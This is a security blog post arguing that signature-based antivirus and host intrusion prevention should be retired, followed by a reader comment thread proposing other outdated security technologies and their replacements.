FireStarter: Security Endangered Species List

By Mike Rothman

Our weekly research meeting started with an optimistic plea from yours truly. Will 2010 finally be the year the signature dies? I mean, come on now, we all know endpoint AV using only signatures is an accident waiting to happen. And everywhere else signatures are used (predominantly IPS & anti-spam) those technologies are heavily supplemented with additional behavioral and heuristic techniques to improve detection.

But the team thought that idea was too restrictive, and largely irrelevant because regardless of the technology used, the vendors adapt their products to keep up with the attacks. Yes, that was my idea of biting sarcasm.

We broadened our thinking significantly, to think about why we haven’t been able to really kill off any security technology, ever. How many of you still use token authenticators? Or line encryptors? It seems once we implement something, we get to live with it for 20 years.

Have you ever tried to actually kill a technology? Someone always finds an edge case where you’d be dead if it happens, so you can’t pull the trigger. Who cares that you have a higher likelihood of getting hit by a meteor in the cranium? Not sure about you, but that annoys the crap out of me.

With all the time and money we spend maintaining and paying for these tools, we aren’t doing more strategic things for the business. Our world is complex enough. We need to make it a point this year to get rid of some of these long-in-the-tooth technologies.

So for this week’s thought generator, let’s put together a security “endangered species list” of things we want to kill. I’ll start:

Signature-based AV Engines – Come on, man! We keep these fat and dumb AV engines around because we are worried that the Melissa virus will make a comeback. Now the vendors need a frackin’ cloud to keep track of all the signatures, which don’t work anyway – given that most of the bad guys use AV* to make sure the major engines are blind to their stuff.

As an alternative, we can (and should) be moving towards a whitelist based approach on servers, where you can lock down the applications, since your servers don’t get pissed when they can’t run Tiger Woods golf or watch March Madness online. These tools are ready for prime time now, and it’s time we killed off the old and busted way of doing things.

And you shouldn’t need to keep paying your desktop AV vendor to maintain that signature database, especially since most of them already offer white-list technology as a different product.

On the endpoints, do we think these AV engines are actually doing any good? Aren’t we better off focusing on patching and ensuring some of the anti-exploitation technologies (like DEP and ASLR) are used within the applications you let users run on their devices? Then we also have to make sure we are watching more closely for compromised endpoints, so bust out that network monitor and ensure you have egress filtering in use. I described these techniques in Low Hanging Fruit: Network Security last week.

With the increasing consumerization of IT, assuming you have control of the endpoint is probably naive at best. Imagine what good all the AV researchers could do if they weren’t spending all day auto-generating signatures?

OK, that one was a bit easy and predictable. As Rich would say, what’s different about that? Nothing, I just wanted to get rolling.

HIPS – As I continue my attack on everything signature, why does HIPS (Host Intrusion Prevention) still exist? I get that folks don’t really do HIPS on the endpoint, but far too many still kill the performance of their servers by comparing activity to known attack code. I’m sure there are some use cases where HIPS is useful, but is it worth the performance penalty and the cost of management and maintenance? Yeah, probably not.

Repeat after me: Black lists are for the birds. Black lists are for the birds. So why do we care about HIPS anymore? Should this also be on the list of security technologies to die?

What say you? Tell me why I’m wrong. What’s on your list? Put it in the comments, and be sure to mention:

  • The technology
  • Why it needs to go
  • What compensating controls can be used for at least equal protection

Remember the best comment of the week can feel good about making a donation to a worthy charity.

Let’s all sing now: The Roof, the roof, the roof is on fire… Now discuss!

No Related Posts


You said want to kill.  I think that SSH-style would be best, but failing that oath/openid are starting to get traction.

By Adam

@Mike.  Regardless of time or budget for new tools, I don’t believe either AV or HIPS have in any way outlived their usefulness.  Any hacker can break any single defense system, but breaking through a multitude of them requires more and more time and resources than are readily available to the masses.  I think that’s more or less wording I took from Rich on a post from a while back.

One of the reasons I enjoy reading this blog over others is that it stays true to the Security problems faced by actual people working in the industry.  Too many opinionated analysts present solutions to problems which only work in a lab setting.  Adding a “second factor” to a username/password combo by applying heuristics on an individuals unique typing characteristics sounds great until its applied in real world corporate setting.

On that note, my comment is getting a bit off topic.  You did ask for comments on disagreements though :).  I do understand the reason for the exercise and will add my own opinion on outdated security:

WAF - Although new technology, it exists as a way of offloading secure coding practices to an appliance.  I would argue that the time and money needed to properly administer a WAF could be used to fix holes in the code.

SSL/TLS - The whole security model of SSL has been broken in too many ways to count.  Prompting a regular user (not trained in security) that the site they have been to every day for years is now not trusted because of a “certificate problem” will not deter them.  I have no idea how to fix this trust model, I can only complain about it :p

Biometrics as single factor - Although hard to compromise quality biometrics, one you have it, your in.  It’s unrealistic to reassign a secure access employee each time their biometrics are compromised.  Keep all biometric systems on at least two factors of authentication.

By Fernando Medrano

@fernando, I’ve been hearing those excuses for years. We all have. Let’s keep around all these old technologies because we don’t have time for the new ones. Unfortunately, those old technologies are long in the tooth and being shredded like Swiss Cheese on a daily basis.

There are always reasons not to do something. And in this case, you don’t have to look too far. The point of the thought experiment is to try to figure out what technologies we can jettison and how we can provide a similar level of protection, using better alternatives.

White listing may not be perfect and may be better suited to servers. But the idea of ten zillion signatures running on all the desktops. Or even better, sending a request to the “cloud” to check if it’s ever seen the signature for every file access is not the way to get this done. It’s just not.

The model is broke. It’s time we acknowledged that and accepted it. Then we can move on to the next thing.

By Mike Rothman

I say we just hack the crap out of our own internal users. Drop USB sticks in the parking lot and pwn their machines. Send phishing emails and show them how you just stole all their money. Those are the kinds of security awareness activities that have an impact.

Not some death by PPT or even worse a web site where they go and attest to the fact that they accept the policy.

By Mike Rothman

My list:

1a. email for password reminder or reset

1b. email addresses as login names

Needs to go because it makes the user’s email account the skeleton key to get into nearly all of their web accounts that only use login+password.

Alternative: Anything that replaces passwords for ID and authentication.  If passwords are still used, encrypted email for password reset would be better than clear text.  How about a phone call instead?

2. Same, old, lame, mind-numbing security awareness programs

Needs to go because they are always the last thought in any security program and they are always driven by the need to get the users to fit the security policies, rather than the reverse.  Plus, they don’t work.

Alternative: Start with usability objectives for security programs and policies.  Build in incentives for users and managers so the see it in their self-interest to improve security.  Then build awareness programs that actually engages the users mind and imagination, not just nagging them with “to-do lists”.  Security computer games, anyone?

By Russell Thomas

While I do agree with many of the posts and opinions on this site, I disagree in this case.  I believe AV and HIPS are still important to the overall protection in depth architecture.  Too many enterprises still run legacy operating systems or unpatched software where upgrading could mean significant time and money.  While in a perfect world I would love having all systems on the latest operating system with the latest patches, that just isn’t realistic in every scenario.

I also don’t believe that white listing can function as a complete replacement to AV, just as a compliment.  I cannot speak with complete authority to this subject as I have not had experience with many products.  However I could envision cases such as the Adobe exploits that might run as part of Adobe (which white listing policy might permit) yet executing embedded malicious code.

HIPS is referred to in this article as signature based, however most of the HIPS products I have used have had little or no use of signatures.  HIPS products which I have experience with learn the system calls of an application and map out their logical flow.  Any deviations from this flow are then blocked.  This is more of a white listing technique than black listing.  I may have missed some research done on the effectiveness of this technique, but I see this as a great compliment to AV and white listing on high priority systems.

By Fernando Medrano

I think disk encryption will be on the motherboard, not the drive. Seems easier to manage that way, especially if you have to swap drives.

By Rich

I’ll play along and try to be controversial!

I’d suggest we ditch the idea of a stand alone firewall.  While this isn’t really a ditching of technology, it is a realization that the technology needs to be embeded into the network.  Thus, the compensating control is proper netwotk design and segmentation along with advanced network technolgy devices that can also intelligently filter. 

On a related note, IPSec VPN’s which require a client software install need to go, haven’t we come far enough with clientless VPN? 

How about disk encryption software?  This can be, and should be, done on the drive, no?  Why do I have to manage yet another peice of agent software?

How about blacklist based website filtering such as is offered by Websense?  There are several solutions that work here without blacklists. 

Finally, how about vulnerability scanners?  Why do I run a scan, generate a report and then go beat ops about the head and neck?  Better vulnerability management exists, is more quick to respond and resolve issues and therefore results in better security.

By ds

Yes, how might we replace the passwords? I believe strong passwords are a must, but it’s not clear to me what alternatives are really realistic.

The return of PKI?

By Mike Rothman

I want to say one word to you. Just one word.


Do I really need to lay out why they need to go, or the many ways we might replace them?

By Adam

If you like to leave comments, and aren’t a spammer, register for the site and email us at and we’ll turn off moderation for your account.